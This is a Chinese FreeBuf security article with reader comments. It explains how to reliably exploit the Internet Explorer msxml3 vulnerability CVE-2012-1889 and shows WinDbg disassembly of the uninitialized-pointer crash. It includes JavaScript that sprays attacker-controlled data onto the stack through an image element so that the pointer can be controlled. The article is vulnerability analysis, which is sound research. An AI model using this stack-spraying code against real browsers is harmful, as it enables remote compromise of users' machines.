暴雷漏洞

暴雷漏洞
FB招聘站
分类阅读
专栏
公开课
FIT 2019
企业服务
用户服务
搜索
投稿
登录
注册
IE漏洞CVE-2012-1889的稳定利用 匿名用户2012-06-18共143866人围观 ，发现 8 个不明物体 WEB安全系统安全
MSF的触发代码如下：
触发时的代码如下：

0:015> u 5dd8d7c9 L50
msxml3!_dispatchImpl::InvokeHelper+0x93:
5dd8d7c9 8b45ec mov eax,dword ptr [ebp-14h]
5dd8d7cc 3bc3 cmp eax,ebx
5dd8d7ce 8bf0 mov esi,eax
5dd8d7d0 7426 je msxml3!_dispatchImpl::InvokeHelper+0xc2 (5dd8d7f8)
5dd8d7d2 ff7528 push dword ptr [ebp+28h]
5dd8d7d5 8b08 mov ecx,dword ptr [eax]
5dd8d7d7 ff7524 push dword ptr [ebp+24h]
5dd8d7da ff7520 push dword ptr [ebp+20h]
5dd8d7dd 57 push edi
5dd8d7de 6a03 push 3
5dd8d7e0 ff7514 push dword ptr [ebp+14h]
5dd8d7e3 6870a8d85d push offset msxml3!GUID_NULL (5dd8a870)
5dd8d7e8 53 push ebx
5dd8d7e9 50 push eax
5dd8d7ea ff5118 call dword ptr [ecx+18h]
其中 5dd8d7c9 8b45ec mov eax,dword ptr [ebp-14h] 中 eax的值来自于栈上，栈上的值未经初始化，被直接用做对象指针后就会出现问题。要稳定利用该漏洞，就需要对eax的值进行控制，只要预先在栈上排布我们要的数据就可以，比如 unescape("%u1111%u1111")。以下代码可以实现该功能：
执行完 pic.nameProp 后，就会在栈上留下0×2000左右大小的可控数据。

var src = unescape("%u1111%u1111");
while (src.length < 0x1002) src += src;
src = "\\\\xxx" + src;
src = src.substr(0, 0x1000 - 10);
var pic = document.createElement("img");
pic.src = src;
pic.nameProp;

相关阅读：暴雷漏洞(CVE-2012-1889)Metasploit利用代码 出自：Inking

匿名用户
660 篇文章
等级： 4级
||
上一篇：[连载]Burp Suite详细使用教程-Intruder模块详解(3)下一篇：Webshell代码检测背后的数学应用
发表评论已有 8 条评论

phper 2012-06-18回复 1楼
我表示看不懂也不会利用

亮了(1)

baidu 2012-06-18回复 2楼
求高手解读

亮了(1)

obama 2012-06-18回复 3楼
高手

亮了(1)

seaeast (1级) 2012-06-18回复 4楼
看不懂，飘过

亮了(1)

zipp0s (1级) 2012-06-19回复 5楼
。

亮了(1)

匿名用户 2012-06-21回复 6楼
这，，转载人家的也不说明来源。还挂了个自己的链接。这也太。。。

亮了(1)

xsser 2012-06-21回复
文章最后，您眼神不大好。。

亮了(2)

enaxM (1级) 2017-01-10回复
@ xsser 一般放开头，放末尾谁看得见啊

亮了(0)
昵称
请输入昵称
必须您当前尚未登录。登陆？注册邮箱
请输入邮箱地址
必须（保密）表情插图
有人回复时邮件通知我

匿名用户

这是一个神奇的马甲

660
文章数
0
评论数
最近文章
北京14岁极客发明神奇眼罩可控制梦境（视频）
2013.09.13

苹果透露更多Touch ID的安全细节
2013.09.12

针对亚马逊云服务器（AWS）的渗透测试工具——Nimbostratus
2013.09.11

浏览更多
相关阅读
暴雷漏洞(CVE-2012-1889)Metasploit利用代码
PowerSploit+Metasploit=Shells暗网有一半以上的数据都是合法的！包括7%的色情网站苹果TV拒绝涉及含“苹果越狱”内容程序深入解析由黑客组织DarkHydrus使用的Powershell恶意软件
特别推荐

关注我们 分享每日精选文章

活动预告
11月

FreeBuf精品公开课·双11学习狂欢节 | 给努力的你打打气
已结束
10月

【16课时-连载中】挖掘CVE不是梦（系列课程2）
已结束
10月

【首节课仅需1元】挖掘CVE不是梦
已结束
9月

【已结束】自炼神兵之自动化批量刷SRC
已结束
FREEBUF免责声明协议条款关于我们加入我们广告及服务寻求报道广告合作联系我们友情链接关注我们
官方微信
新浪微博腾讯微博Twitter赞助商
Copyright © 2018 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号
css.php 正在加载中...0daybank